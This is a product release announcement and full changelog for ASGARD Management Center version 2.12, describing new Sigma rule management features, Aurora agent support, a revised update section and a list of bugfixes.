The new ASGARD Management Center version 2.12 adds new features and fixes several issues that were introduced with the version 2.11 in December last year.
Better Sigma Rule Management
We’ve added new features and improved the usability of the sigma rule management section, which is relevant for the released LogWatcher agent and beta customers testing our new Aurora agent.
The most important new features are the false positive and response editor, which allows Aurora customers to configure response actions for a triggering rule.
The false positive filter enables users to add filters that, instead of changing the original rule, extend it during deployment. This makes it easy to use updated rules with the same custom filter values that are only relevant in the user’s environment.
Revised Updates Section
The update section for the scanners and signatures has been revised. Each action has been reworked. Users can now trigger and update manually and check the log of the update process in a separate tab.
Full change log:
– Feature: Support Aurora Agent (Beta Only)
– Feature: Manage Sigma Responses and False Positives (Aurora Only)
– Feature: Enable / Disable Sigma Rules
– Feature: Manually check for THOR and Signature Updates
– Feature: Show log of previous update process
– Feature: Auto Config for Sigma Rulesets (Automatically add new Sigma Rules based on level)
– Feature: The UI now has a lot more indicators for e.g. ‘Asset Requests’, ‘Uncompiled Rulesets’ and more
– Feature: Added more graphs to overview page, e.g. incoming Aurora and Log Watcher events
– Feature: Added bulk update for available Sigma rule updates
– Feature: Added default Sigma Rulesets (if no ruleset has been created yet)
– Feature: Added background routine that removes older and unused THOR / Signature versions
– Feature: Edit Scan Templates
– Feature: Search THOR Flags / Aurora Options
– Feature: Download THOR Zip with target hostname as filename
– Change: Improved Server Status indicators
– Change: Improved licensing
– Change: LDAP users require at least one LDAP role, otherwise they are not authenticated anymore
– Change: Updated Sigma rules
– Change: Cosmetics and UX improvements
– Change: Updated default THOR and Signature auto-update config
– Change: Added more links and password reset help to login page
– Change: Improved usability and feedback in IOC Management section
– Change: Require current password for password change
– Bugfix: Re-added and improved “no labels” filter in assets table
– Bugfix: Re-added resize buttons for Remote Console
– Bugfix: Fixed an issue that causes some API keys to be corrupt
– Bugfix: Fixed non-working ‘Install Service Controller’ playbook on Master ASGARD
– Bugfix: Updated interrogate job to detect ‘Windows 11’ correctly
– Bugfix: Fixed corrupt ‘Is Domain Controller: No’ filter
– Bugfix: Fixed missing default value when editing Sigma or YARA rules in IOC Management
– Bugfix: Fixed non-working “use newer Sigma rule” button
– Bugfix: Fixed CRLF issues in IOC Management for some IOC types
– Bugfix: Fixed some missing MISP iocs in THOR download package
– Bugfix: Fixed permissions on some files that caused backup process of ASGARD config files on Master ASGARD to not work properly
– Bugfix: Fixed encryption issues with custom signatures for THOR Lite
– Bugfix: Fixed missing import in ntp config that causes ntp to not work properly on some ASGARDs
– Bugfix: Fixed tasks that are pending forever due to unknown task module
– Bugfix: Fixed non-working rsyslog reload after monthly logrotation
– Bugfix: Fixed wrong file extension of stdout and stderr file in group task result package
To install the update, visit the “Updates > Management Center” section.